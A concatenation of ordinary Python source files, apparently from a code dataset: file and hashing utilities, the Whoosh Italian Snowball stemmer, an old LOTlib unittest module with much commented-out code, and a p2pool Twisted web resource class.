def setFileContent(filename, txt, createFolders=False):
try:
if createFolders:
folderPath = os.path.dirname(filename)
if not os.path.exists(folderPath):
os.makedirs(folderPath, 0777)
f = codecs.open(filename, 'w','utf-8')
f.write(txt)
f.close()
return True
except:
return False
def appendFileContent(filename, txt):
try:
f = codecs.open(filename, 'a','utf-8')
f.write(txt)
f.close()
return True
except:
return False
def md5(fileName, excludeLine="", includeLine=""):
"""Compute md5 hash of the specified file"""
m = hashlib.md5()
try:
fd = codecs.open(fileName,"rb",'utf-8')
except IOError:
#print "Unable to open the file in readmode:", fileName
return
content = fd.readlines()
fd.close()
for eachLine in content:
if excludeLine and eachLine.startswith(excludeLine):
continue
m.update(eachLine)
m.update(includeLine)
return m.hexdigest()
def lastModifiedAt(path):
return datetime.datetime.utcfromtimestamp(os.path.getmtime(path))
def setLastModifiedAt(path, date):
try:
stinfo = os.stat(path)
atime = stinfo.st_atime
mtime = int(time.mktime(date.timetuple()))
os.utime(path, (atime, mtime))
return True
except:
pass
return False
def checkQuota(directory, limit=200*1024):
total_size = 0
for root, dirs, files in os.walk(directory, topdown=False):
for name in files:
total_size += os.path.getsize(os.path.join(root, name))
if total_size > limit:
return limit, False
return total_size, True
def clearDirectory(path):
try:
for root, _, files in os.walk(path , topdown = False):
for name in files:
os.remove(os.path.join(root, name))
except:
return False
return True
# http://akiscode.com/articles/sha-1directoryhash.shtml
# Copyright (c) 2009 Stephen Akiki
# MIT License (Means you can do whatever you want with this)
# See http://www.opensource.org/licenses/mit-license.php
# Error Codes:
# -1 -> Directory does not exist
# -2 -> General error (see stack traceback)
def GetHashofDirs(directory, verbose=0):
SHAhash = hashlib.sha1()
if not os.path.exists (directory):
return -1
try:
for root, _, files in os.walk(directory):
for names in files:
#if verbose == 1:
#print 'Hashing', names
filepath = os.path.join(root,names)
try:
f1 = codecs.open(filepath, 'rb','utf-8')
except:
# You can't open the file for some reason
f1.close()
continue
while 1:
# Read file in as little chunks
buf = f1.read(4096)
if not buf:
break
SHAhash.update(hashlib.sha1(buf).hexdigest())
f1.close()
except:
import traceback
# Print the stack traceback
traceback.print_exc()
return -2
return SHAhash.hexdigest()
|
vbshah1992/microblog | refs/heads/master | flask/lib/python2.7/site-packages/whoosh/lang/snowball/italian.py | 96 | from .bases import _StandardStemmer
from whoosh.compat import u
class ItalianStemmer(_StandardStemmer):
"""
The Italian Snowball stemmer.
:cvar __vowels: The Italian vowels.
:type __vowels: unicode
:cvar __step0_suffixes: Suffixes to be deleted in step 0 of the algorithm.
:type __step0_suffixes: tuple
:cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
:type __step1_suffixes: tuple
:cvar __step2_suffixes: Suffixes to be deleted in step 2 of the algorithm.
:type __step2_suffixes: tuple
:note: A detailed description of the Italian
stemming algorithm can be found under
http://snowball.tartarus.org/algorithms/italian/stemmer.html
"""
__vowels = u("aeiou\xE0\xE8\xEC\xF2\xF9")
__step0_suffixes = ('gliela', 'gliele', 'glieli', 'glielo',
'gliene', 'sene', 'mela', 'mele', 'meli',
'melo', 'mene', 'tela', 'tele', 'teli',
'telo', 'tene', 'cela', 'cele', 'celi',
'celo', 'cene', 'vela', 'vele', 'veli',
'velo', 'vene', 'gli', 'ci', 'la', 'le',
'li', 'lo', 'mi', 'ne', 'si', 'ti', 'vi')
__step1_suffixes = ('atrice', 'atrici', 'azione', 'azioni',
'uzione', 'uzioni', 'usione', 'usioni',
'amento', 'amenti', 'imento', 'imenti',
'amente', 'abile', 'abili', 'ibile', 'ibili',
'mente', 'atore', 'atori', 'logia', 'logie',
'anza', 'anze', 'iche', 'ichi', 'ismo',
'ismi', 'ista', 'iste', 'isti', u('ist\xE0'),
u('ist\xE8'), u('ist\xEC'), 'ante', 'anti',
'enza', 'enze', 'ico', 'ici', 'ica', 'ice',
'oso', 'osi', 'osa', 'ose', u('it\xE0'),
'ivo', 'ivi', 'iva', 'ive')
__step2_suffixes = ('erebbero', 'irebbero', 'assero', 'assimo',
'eranno', 'erebbe', 'eremmo', 'ereste',
'eresti', 'essero', 'iranno', 'irebbe',
'iremmo', 'ireste', 'iresti', 'iscano',
'iscono', 'issero', 'arono', 'avamo', 'avano',
'avate', 'eremo', 'erete', 'erono', 'evamo',
'evano', 'evate', 'iremo', 'irete', 'irono',
'ivamo', 'ivano', 'ivate', 'ammo', 'ando',
'asse', 'assi', 'emmo', 'enda', 'ende',
'endi', 'endo', 'erai', 'erei', 'Yamo',
'iamo', 'immo', 'irai', 'irei', 'isca',
'isce', 'isci', 'isco', 'ano', 'are', 'ata',
'ate', 'ati', 'ato', 'ava', 'avi', 'avo',
u('er\xE0'), 'ere', u('er\xF2'), 'ete', 'eva',
'evi', 'evo', u('ir\xE0'), 'ire', u('ir\xF2'),
'ita', 'ite', 'iti', 'ito', 'iva', 'ivi',
'ivo', 'ono', 'uta', 'ute', 'uti', 'uto',
'ar', 'ir')
def stem(self, word):
"""
Stem an Italian word and return the stemmed form.
:param word: The word that is stemmed.
:type word: str or unicode
:return: The stemmed form.
:rtype: unicode
"""
word = word.lower()
step1_success = False
# All acute accents are replaced by grave accents.
word = (word.replace(u("\xE1"), u("\xE0"))
.replace(u("\xE9"), u("\xE8"))
.replace(u("\xED"), u("\xEC"))
.replace(u("\xF3"), u("\xF2"))
.replace(u("\xFA"), u("\xF9")))
# Every occurrence of 'u' after 'q'
# is put into upper case.
for i in range(1, len(word)):
if word[i - 1] == "q" and word[i] == "u":
word = "".join((word[:i], "U", word[i + 1:]))
# Every occurrence of 'u' and 'i'
# between vowels is put into upper case.
for i in range(1, len(word) - 1):
if word[i - 1] in self.__vowels and word[i + 1] in self.__vowels:
if word[i] == "u":
word = "".join((word[:i], "U", word[i + 1:]))
elif word[i] == "i":
word = "".join((word[:i], "I", word[i + 1:]))
r1, r2 = self._r1r2_standard(word, self.__vowels)
rv = self._rv_standard(word, self.__vowels)
# STEP 0: Attached pronoun
for suffix in self.__step0_suffixes:
if rv.endswith(suffix):
if rv[-len(suffix) - 4:-len(suffix)] in ("ando", "endo"):
word = word[:-len(suffix)]
r1 = r1[:-len(suffix)]
r2 = r2[:-len(suffix)]
rv = rv[:-len(suffix)]
elif (rv[-len(suffix) - 2:-len(suffix)] in
("ar", "er", "ir")):
word = "".join((word[:-len(suffix)], "e"))
r1 = "".join((r1[:-len(suffix)], "e"))
r2 = "".join((r2[:-len(suffix)], "e"))
rv = "".join((rv[:-len(suffix)], "e"))
break
# STEP 1: Standard suffix removal
for suffix in self.__step1_suffixes:
if word.endswith(suffix):
if suffix == "amente" and r1.endswith(suffix):
step1_success = True
word = word[:-6]
r2 = r2[:-6]
rv = rv[:-6]
if r2.endswith("iv"):
word = word[:-2]
r2 = r2[:-2]
rv = rv[:-2]
if r2.endswith("at"):
word = word[:-2]
rv = rv[:-2]
elif r2.endswith(("os", "ic")):
word = word[:-2]
rv = rv[:-2]
elif r2 .endswith("abil"):
word = word[:-4]
rv = rv[:-4]
elif (suffix in ("amento", "amenti",
"imento", "imenti") and
rv.endswith(suffix)):
step1_success = True
word = word[:-6]
rv = rv[:-6]
elif r2.endswith(suffix):
step1_success = True
if suffix in ("azione", "azioni", "atore", "atori"):
word = word[:-len(suffix)]
r2 = r2[:-len(suffix)]
rv = rv[:-len(suffix)]
if r2.endswith("ic"):
word = word[:-2]
rv = rv[:-2]
elif suffix in ("logia", "logie"):
word = word[:-2]
rv = word[:-2]
elif suffix in ("uzione", "uzioni",
"usione", "usioni"):
word = word[:-5]
rv = rv[:-5]
elif suffix in ("enza", "enze"):
word = "".join((word[:-2], "te"))
rv = "".join((rv[:-2], "te"))
elif suffix == u("it\xE0"):
word = word[:-3]
r2 = r2[:-3]
rv = rv[:-3]
if r2.endswith(("ic", "iv")):
word = word[:-2]
rv = rv[:-2]
elif r2.endswith("abil"):
word = word[:-4]
rv = rv[:-4]
elif suffix in ("ivo", "ivi", "iva", "ive"):
word = word[:-3]
r2 = r2[:-3]
rv = rv[:-3]
if r2.endswith("at"):
word = word[:-2]
r2 = r2[:-2]
rv = rv[:-2]
if r2.endswith("ic"):
word = word[:-2]
rv = rv[:-2]
else:
word = word[:-len(suffix)]
rv = rv[:-len(suffix)]
break
# STEP 2: Verb suffixes
if not step1_success:
for suffix in self.__step2_suffixes:
if rv.endswith(suffix):
word = word[:-len(suffix)]
rv = rv[:-len(suffix)]
break
# STEP 3a
if rv.endswith(("a", "e", "i", "o", u("\xE0"), u("\xE8"),
u("\xEC"), u("\xF2"))):
word = word[:-1]
rv = rv[:-1]
if rv.endswith("i"):
word = word[:-1]
rv = rv[:-1]
# STEP 3b
if rv.endswith(("ch", "gh")):
word = word[:-1]
word = word.replace("I", "i").replace("U", "u")
return word
|
ebigelow/LOTlib | refs/heads/master | LOTlib/Testing/old/MiscellaneousTest.py | 2 | """
class to test Miscellaneous.py
follows the standards in https://docs.python.org/2/library/unittest.html
"""
import unittest
from LOTlib.Miscellaneous import *
class MiscellaneousTest(unittest.TestCase):
# initialization that happens before each test is carried out
def setUp(self):
self.array = [10,9,8,7,6,5,4,3,2,1]
# tests the first, second, ... functions
def test_number_functions(self):
self.assertEqual(first(self.array), 10)
self.assertEqual(second(self.array), 9)
self.assertEqual(third(self.array), 8)
self.assertEqual(fourth(self.array), 7)
self.assertEqual(fifth(self.array), 6)
self.assertEqual(sixth(self.array), 5)
self.assertEqual(seventh(self.array), 4)
self.assertEqual(eighth(self.array), 3)
self.assertTrue(isinstance(dropfirst(self.array), types.GeneratorType))
def test_None2Empty(self):
none = None
# Treat Nones as empty
self.assertEqual(None2Empty(none), [])
self.assertEqual(None2Empty(self.array), self.array)
# def test_make_mutable(self):
# # TODO: update with other types
# if isinstance(x, frozenset): return set(x)
# elif isinstance(x, tuple): return list(x)
# else: return x
# def test_make_immutable(self):
# # TODO: update with other types
# if isinstance(x, set ): return frozenset(x)
# elif isinstance(x, list): return tuple(x)
# else: return x
def test_unlist_singleton(self):
"""
Remove any sequences of nested lists with one element.
e.g. [[[1,3,4]]] -> [1,3,4]
"""
self.assertEqual(unlist_singleton(self.array), self.array)
self.assertEqual(unlist_singleton([[[1,3,4]]]), [1,3,4])
self.assertEqual(unlist_singleton([]), [])
def test_list2sexpstr(self):
"""
Prints a python list-of-lists as an s-expression
[['K', 'K'], [['S', 'K'], ['I', 'I']]] --> ((K K) ((S K) (I I)))
"""
self.assertEqual(list2sexpstr([['K', 'K'], [['S', 'K'], ['I', 'I']]]), '((K K) ((S K) (I I)))')
self.assertEqual(list2sexpstr([]), '()')
# s = re.sub(r'[\'\",]', r'', str(lst))
# s = re.sub(r'\[', '(', s) # changed r'(' to '('
# s = re.sub(r'\]', ')', s) # changed r')' to ')'
# return s
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Display functions
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def test_q(self):
"""
Quotes a string
"""
self.assertEqual(q("This is a string"), "'This is a string'")
self.assertEqual(q("This is a string", quote="\""), "\"This is a string\"")
self.assertEqual(q([]), "'[]'")
self.assertTrue(qq("This is a string") == q("This is a string", quote='"') == "\"This is a string\"")
# def test_qq(x): return q(x,quote="\"")
# def test_display(x): print x
# # for functional programming, print something and return it
# def test_printr(x):
# print x
# return x
# def test_r2(x): return round(x,2)
# def test_r3(x): return round(x,3)
# def test_r4(x): return round(x,4)
# def test_r5(x): return round(x,5)
# def test_tf201(x):
# if x: return 1
# else: return 0
# ## Functions for I/O
# def test_display_option_summary(obj):
# """
# Prints out a friendly format of all options -- for headers of output files
# This takes in an OptionParser object as an argument. As in, (options, args) = parser.parse_args()
# """
# from time import strftime, time, localtime
# import os
# print "####################################################################################################"
# try: print "# Username: ", os.getlogin()
# except OSError: pass
# try: print "# Date: ", strftime("%Y %b %d (%a) %H:%M:%S", localtime(time()) )
# except OSError: pass
# try: print "# Uname: ", os.uname()
# except OSError: pass
# try: print "# Pid: ", os.getpid()
# except OSError: pass
# for slot in dir(obj):
# attr = getattr(obj, slot)
# if not isinstance(attr, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)) and (slot is not "__doc__") and (slot is not "__module__"):
# print "#", slot, "=", attr
# print "####################################################################################################"
# # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# # Genuine Miscellany
# # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# # a wrapper so we can call this in the below weirdo composition
# def test_raise_exception(e): raise e
# def test_ifelse(x,y,z):
# if x: return y
# else: return z
# def test_unique(gen):
# """
# Make a generator unique, returning each element only once
# """
# s = set()
# for gi in gen:
# if gi not in s:
# yield gi
# s.add(gi)
# def test_UniquifyFunction(gen):
# """
# A decorator to make a function only return unique values
# """
# def test_f(*args, **kwargs):
# for x in unique(gen(*args, **kwargs)):
# yield x
# return f
# def test_flatten(expr):
# """
# Flatten lists of lists, via stackoverflow
# """
# def test_flatten_(expr):
# #print 'expr =', expr
# if expr is None or not isinstance(expr, collections.Iterable) or isinstance(expr, str):
# yield expr
# else:
# for node in expr:
# #print node, type(node)
# if (node is not None) and isinstance(node, collections.Iterable) and (not isinstance(node, str)):
# #print 'recursing on', node
# for sub_expr in flatten_(node):
# yield sub_expr
# else:
# #print 'yielding', node
# yield node
# return tuple([x for x in flatten_(expr)])
# def test_flatten2str(expr, sep=' '):
# try:
# if expr is None: return ''
# else: return sep.join(flatten(expr))
# except TypeError:
# print "Error in flatter2str:", expr
# raise TypeError
# def test_weave(*iterables):
# """
# Intersperse several iterables, until all are exhausted.
# This nicely will weave together multiple chains
# from: http://www.ibm.com/developerworks/linux/library/l-cpyiter/index.html
# """
# iterables = map(iter, iterables)
# while iterables:
# for i, it in enumerate(iterables):
# try: yield it.next()
# except StopIteration: del iterables[i]
# # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# # Math functions
# # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# # Special handilng for numpypy that doesn't use gammaln, assertion error otherwise
# try:
# from scipy.special import gammaln
# except ImportError:
# # Die if we try to use this in numpypy
# def test_gammaln(*args, **kwargs): assert False
# ## This is just a wrapper to avoid logsumexp([-inf, -inf, -inf...]) warnings
# try:
# from scipy.misc import logsumexp as scipy_logsumexp
# except ImportError:
# try:
# from scipy.maxentropy import logsumexp as scipy_logsumexp
# except ImportError:
# # fine, our own version, no numpy
# def test_scipy_logsumexp(v):
# m = max(v)
# return m+log(sum(map( lambda x: exp(x-m), v)))
# def test_logsumexp(v):
# """
# Logsumexp - our own version wraps the scipy to handle -infs
# """
# if max(v) > -Infinity: return scipy_logsumexp(v)
# else: return -Infinity
# def test_lognormalize(v):
# return v - logsumexp(v)
# def test_logplusexp(a, b):
# """
# Two argument version. No cast to numpy, so faster
# """
# m = max(a,b)
# return m+log(exp(a-m)+exp(b-m))
# def test_beta(a):
# """ Here a is a vector (of ints or floats) and this computes the Beta normalizing function,"""
# return np.sum(gammaln(np.array(a, dtype=float))) - gammaln(float(sum(a)))
# def test_normlogpdf(x, mu, sigma):
# """ The log pdf of a normal distribution """
# #print x, mu
# return math.log(math.sqrt(2. * pi) * sigma) - ((x - mu) * (x - mu)) / (2.0 * sigma * sigma)
# def test_norm_lpdf_multivariate(x, mu, sigma):
# # Via http://stackoverflow.com/questions/11615664/multivariate-normal-density-in-python
# size = len(x)
# # some checks:
# if size != len(mu) or (size, size) != sigma.shape: raise NameError("The dimensions of the input don't match")
# det = np.linalg.det(sigma)
# if det == 0: raise NameError("The covariance matrix can't be singular")
# norm_const = - size*log(2.0*pi)/2.0 - log(det)/2.0
# #norm_const = 1.0/ ( math.pow((2*pi),float(size)/2) * math.pow(det,1.0/2) )
# x_mu = np.matrix(x - mu)
# inv = np.linalg.inv(sigma)
# result = -0.5 * (x_mu * inv * x_mu.T)
# return norm_const + result
# def test_logrange(mn,mx,steps):
# """
# Logarithmically-spaced steps from mn to mx, with steps number inbetween
# mn - min value
# mx - max value
# steps - number of steps between. When 1, only mx is returned
# """
# mn = np.log(mn)
# mx = np.log(mx)
# r = np.arange(mn, mx, (mx-mn)/(steps-1))
# r = np.append(r, mx)
# return np.exp(r)
# def test_geometric_ldensity(n,p):
# """ Log density of a geomtric distribution """
# return (n-1)*log(1.0-p)+log(p)
# from math import expm1, log1p
# def test_log1mexp(a):
# """
# Computes log(1-exp(a)) according to Machler, "Accurately computing ..."
# Note: a should be a large negative value!
# """
# if a > 0: print >>sys.stderr, "# Warning, log1mexp with a=", a, " > 0"
# if a < -log(2.0): return log1p(-exp(a))
# else: return log(-expm1(a))
# # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# # Sampling functions
# # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# def test_sample1(*args): return sample_one(*args)
# def test_sample_one(*args):
# if len(args) == 1: return sample(args[0],1)[0] # use the list you were given
# else: return sample(args, 1)[0] # treat the arguments as a list
# def test_flip(p): return (random() < p)
# ## TODO: THIS FUNCTION SUCKS PLEASE FIX IT
# ## TODO: Change this so that if N is large enough, you sort
# # takes unnormalized probabilities and returns a list of the log probability and the object
# # returnlist makes the return always a list (even if N=1); otherwise it is a list for N>1 only
# # NOTE: This now can take probs as a function, which is then mapped!
# def test_weighted_sample(objs, N=1, probs=None, log=False, return_probability=False, returnlist=False, Z=None):
# """
# When we return_probability, it is *always* a log probability
# """
# # check how probabilities are specified
# # either as an argument, or attribute of objs (either probability or lp
# # NOTE: THis ALWAYS returns a log probability
# if len(objs) == 0: return None
# # convert to support indexing if we need it
# if isinstance(objs, set):
# objs = list(objs)
# myprobs = None
# if probs is None: # defatest_ultly, we use .lp
# myprobs = [1.0] * len(objs) # sample uniform
# elif isinstance(probs, types.FunctionType): # NOTE: this does not work for class instance methods
# myprobs = map(probs, objs)
# else:
# myprobs = map(float, probs)
# # Now normalize and run
# if Z is None:
# if log: Z = logsumexp(myprobs)
# else: Z = sum(myprobs)
# #print log, myprobs, Z
# out = []
# for n in range(N):
# r = random()
# for i in range(len(objs)):
# if log: r = r - exp(myprobs[i] - Z) # log domain
# else: r = r - (myprobs[i]/Z) # probability domain
# #print r, myprobs
# if r <= 0:
# if return_probability:
# lp = 0
# if log: lp = myprobs[i] - Z
# else: lp = math.log(myprobs[i]) - math.log(Z)
# out.append( [objs[i],lp] )
# break
# else:
# out.append( objs[i] )
# break
# if N == 1 and (not returnlist): return out[0] # don't give back a list if you just want one
# else: return out
# # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# # Lambda calculus
# # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# # Some innate lambdas
# def test_lambdaZero(*x): return 0
# def test_lambdaOne(*x): return 1
# def test_lambdaNull(*x): return []
# def test_lambdaNone(*x): return None
# def test_lambdaTrue(*x): return True
# def test_lambdaFalse(*x): return True
# def test_lambdaNAN(*x): return float("nan")
# def test_lambda_str(fn):
# """
# A nicer printer for pure lambda calculus
# """
# if fn is None: # just pass these through -- simplifies a lot
# return None
# elif fn.name == '':
# assert len(fn.args)==1
# return lambda_str(fn.args[0])
# elif fn.name == 'lambda':
# assert len(fn.args)==1
# #return u"\u03BB%s.%s" % (fn.bv_name, lambda_str(fn.args[0]))
# return "L%s.%s" % (fn.bv_name, lambda_str(fn.args[0]))
# elif fn.name == 'apply_':
# assert len(fn.args)==2
# if fn.args[0].name == 'lambda':
# return "((%s)(%s))" % tuple(map(lambda_str, fn.args))
# else:
# return "(%s(%s))" % tuple(map(lambda_str, fn.args))
# else:
# assert fn.args is None
# return str(fn.name)
# A Test Suite composed of all tests in this class
def suite():
return unittest.TestLoader().loadTestsFromTestCase(MiscellaneousTest)
# main code to run the test
if __name__ == '__main__':
unittest.main()
|
rickmei/p2pool | refs/heads/master | p2pool/util/deferred_resource.py | 283 | from __future__ import division
from twisted.internet import defer
from twisted.web import resource, server
from twisted.python import log
class DeferredResource(resource.Resource):
def render(self, request):
def finish(x):
if request.channel is None: # disconnected
return
if x is not None:
request.write(x)
request.finish()
def finish_error(fail):
if request.channel is None: # disconnected
return
request.setResponseCode(500) # won't do anything if already written to
request.write('---ERROR---')
request.finish()
log.err(fail, "Error in DeferredResource handler:")
defer.maybeDeferred(resource.Resource.render, self, request).addCallbacks(finish, finish_error)
return server.NOT_DONE_YET
|